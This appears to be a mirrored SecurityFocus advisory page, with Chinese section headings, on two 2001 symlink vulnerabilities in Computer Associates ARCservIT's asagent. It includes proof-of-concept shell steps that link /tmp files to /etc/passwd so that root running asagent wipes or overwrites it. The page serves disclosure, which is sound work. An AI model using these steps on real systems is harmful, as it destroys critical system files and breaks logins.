-
公告与补丁

Computer Associates has reportedly been made aware of this vulnerability. Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

-
漏洞信息 (20867)

source: http://www.securityfocus.com/bid/2741/info
ARCservIT from Computer Associates contains a vulnerability which may allow malicious local users to overwrite arbitrary files.
When it runs for the first time, 'asagent', opens (and truncates it if it exists) a file in /tmp called 'asagent.tmp'. 'asagent' does not check to make sure that this file already exists or that is a symbolic link to another file.
This may allow malicious local users to overwrite critical system files.
As user:
je@boxname~> ln -s /etc/passwd /tmp/asagent.tmp
And root:
root@boxname# /usr/CYEagent/asagent start
CA Universal Agent ADV v1.39 started on openview SunOS 5.8
Generic_108528-07 sun4u
ARCserveIT Universal Agent started...
Then,
je@boxname~> ls -la /etc/passwd
-r--r--r-- 1 0 sys 0 May 9 11:59 /etc/passwd

-
漏洞信息 (20868)

source: http://www.securityfocus.com/bid/2748/info
ARCservIT from Computer Associates contains a vulnerability which may allow malicious local users to corrupt arbitrary files.
When it runs with the parameters 'inet add', 'asagent', opens (and overwrites it if it exists) a file in /tmp called 'inetd.tmp'. 'asagent' does not check to make sure that this file already exists or that is a symbolic link to another file.
This may allow malicious local users to corrupt critical system files.
je@boxname~> ln -s /etc/passwd /tmp/inetd.tmp
And root:
root@boxname# /usr/CYEagent/asagent inet add
Then,
je@boxname~> cat /etc/passwd
asagentd 6051/tcp # ARCserve agent
asagentd 6051/udp # ARCserve agent

-
受影响的程序版本

-
漏洞讨论

ARCservIT from Computer Associates contains a vulnerability which may allow malicious local users to corrupt arbitrary files.

When it runs with the parameters 'inet add', 'asagent', opens (and overwrites it if it exists) a file in /tmp called 'inetd.tmp'. 'asagent' does not check to make sure that this file already exists or that is a symbolic link to another file.

This may allow malicious local users to corrupt critical system files.

-
漏洞利用

This example was posted to BugTraq by Jonas Eriksson &lt;je@sekure.net&gt; by May 18th, 2001.

-
解决方案

Computer Associates has reportedly been made aware of this vulnerability.

Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.